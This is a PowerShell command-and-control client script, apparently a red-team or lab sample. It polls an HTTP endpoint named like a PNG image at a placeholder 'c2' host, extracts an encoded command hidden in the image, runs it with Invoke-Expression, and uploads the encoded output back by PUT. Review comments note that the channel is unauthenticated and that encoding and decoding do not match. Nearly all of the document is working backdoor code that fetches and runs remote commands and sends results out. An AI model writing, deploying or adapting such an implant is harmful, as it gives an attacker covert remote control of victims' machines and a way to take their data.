C2 (command-and-control) client PowerShell script based on the CQExtractor module: it polls an HTTP "image" for an encoded command, runs it with Invoke-Expression, and PUTs the encoded result back.
Import-Module .\CQExtractor.psm1 -Force

# FIXME: replace with real C2 hostname
# Single "image" endpoint used for everything: HEAD/GET to poll for a command,
# PUT to return the result. The scheme is plain http, so nothing on this side
# protects the command channel from an on-path party.
$C2 = 'http://c2:8080/image.png'

# Local scratch files: the downloaded command image and the outgoing result image.
$filename  = 'image.png'
$filename2 = 'image2.png'
class Encoder {
    # Substitution table layered on top of Base64. Every key is a character that
    # is easy to misread in a rendered image (l/1/L, i/I, o/O/0, w/W) or is the
    # Base64 padding character (=); each maps to a two-character ".X" token.
    # None of the token letters (A-H, J, K, Q) is itself a key, so the order in
    # which the table is walked (Hashtable enumeration order is unspecified)
    # cannot change the output, and "." never occurs in Base64, so decoding is
    # unambiguous.
    [system.collections.hashtable]$arr

    Encoder() {
        $this.arr = New-Object system.collections.hashtable
        $pairs = @(
            @('l', '.A'), @('1', '.B'), @('L', '.C'),
            @('i', '.D'), @('I', '.E'),
            @('o', '.F'), @('O', '.G'), @('0', '.H'),
            @('w', '.J'), @('W', '.K'),
            @('=', '.Q')
        )
        foreach ($pair in $pairs) {
            $this.arr[$pair[0]] = $pair[1]
        }
    }

    # Base64 of the UTF-16LE bytes of $str, with the substitution table applied.
    # NOTE(review): Encode emits UTF-16LE but Decode reads the Base64 payload as
    # UTF-8, so the two are not inverses of each other (Decode(Encode("AB")) is
    # "A`0B`0", not "AB"). Whether the server side expects exactly this
    # asymmetry cannot be told from this file — confirm before relying on it.
    [string] Encode([string]$str) {
        $raw = [System.Text.Encoding]::Unicode.GetBytes($str)
        $out = [Convert]::ToBase64String($raw)
        foreach ($entry in $this.arr.GetEnumerator()) {
            $out = $out.Replace([string]$entry.Key, [string]$entry.Value)
        }
        return $out
    }

    # Reverse the substitution table, then Base64-decode and read as UTF-8.
    # $str is left untyped as in the original; a $null input fails on .Replace.
    [string] Decode($str) {
        $b64 = $str
        foreach ($entry in $this.arr.GetEnumerator()) {
            $b64 = $b64.Replace([string]$entry.Value, [string]$entry.Key)
        }
        $raw = [System.Convert]::FromBase64String($b64)
        return [System.Text.Encoding]::UTF8.GetString($raw)
    }
}
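$encoder = new-object Encoder

# Polling loop. The C2 "image" is re-fetched only when the server's
# Last-Modified is newer than the local copy's LastWriteTime, so each
# server-side update is executed once; the decoded text goes straight to
# Invoke-Expression.
#
# NOTE(review): the transport is plain HTTP and nothing here authenticates the
# server or the payload (no TLS, no signature, no shared secret). Whoever can
# answer for the $C2 host — DNS/hosts poisoning, an on-path attacker, or a
# takeover of the server — gets arbitrary code execution on this machine.
# That is a property of this sample's design; keep it in mind before running
# it anywhere that is not a lab.
while (1) {
    # Before the first fetch there is no local file; use MinValue so that any
    # Last-Modified counts as new instead of relying on Get-Item erroring into
    # $null as the original did.
    $lastEdit = if (Test-Path -Path $filename) {
        (Get-Item -Path $filename).LastWriteTime
    } else {
        [DateTime]::MinValue
    }

    $request = Invoke-WebRequest -URI $C2 -Method HEAD
    # "$(...)" flattens the header whether it is a string (PS 5) or a
    # string[] (PS 6+). With no Last-Modified at all we cannot detect a change,
    # so fall back to MinValue, which keeps polling (same outcome as before).
    $lastModified = "$($request.Headers.'Last-Modified')"
    $serverEdit = if ($lastModified) { [DateTime]$lastModified } else { [DateTime]::MinValue }
    if ($serverEdit -le $lastEdit) {
        # nothing new on the server
        Start-Sleep -Seconds 2
        continue
    }

    $response = Invoke-WebRequest -URI $C2 -OutFile $filename
    $b64 = (Export-PngToString -Path $filename).text
    $cmd = $encoder.Decode($b64)
    if ($cmd) {
        # Invoke payload. Merge the error stream and catch terminating errors so
        # a failing command is reported back to the server instead of killing
        # the loop (previously a parse error in $cmd ended the script).
        try {
            [string]$result = Invoke-Expression -Command $cmd 2>&1
        } catch {
            [string]$result = "$_"
        }
        # Save result
        $encoder.Encode($result) | Export-StringToPng -Path $filename2
        # Best-effort upload: a failed PUT is logged, not fatal, as before.
        try {
            Invoke-RestMethod -Method PUT -Uri $C2 -InFile $filename2
        } catch {
            Write-Verbose "PUT of result image failed: $_"
        }
    }
    else {
        write-error "Couldn't decode ($b64/$cmd)"
        # Empty PUT signals to the server that the image could not be decoded.
        try {
            Invoke-RestMethod -Method PUT -Uri $C2
        } catch {
            Write-Verbose "Empty PUT failed: $_"
        }
    }
}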